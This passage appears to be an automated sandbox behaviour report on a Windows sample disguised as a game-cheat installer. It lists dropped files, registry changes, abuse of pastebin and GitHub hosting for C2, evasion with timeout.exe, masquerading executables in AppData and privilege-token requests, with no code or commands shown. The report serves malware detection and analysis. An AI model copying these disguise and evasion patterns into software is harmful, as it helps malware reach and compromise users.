File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\e58466a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI491A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7F29.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI250.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e58466e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI251.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e58466a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8075.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8151.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8171.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8309.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7E7C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7F78.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID293.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID2A3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4BDC.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4CA8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4D84.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICC77.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI24F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI64C8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4B2F.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7FC7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2DF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4A53.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6330.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI641B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7E6B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI82E9.tmp C:\Windows\system32\msiexec.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1A\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\syswow64\MsiExec.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\syswow64\MsiExec.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller" C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
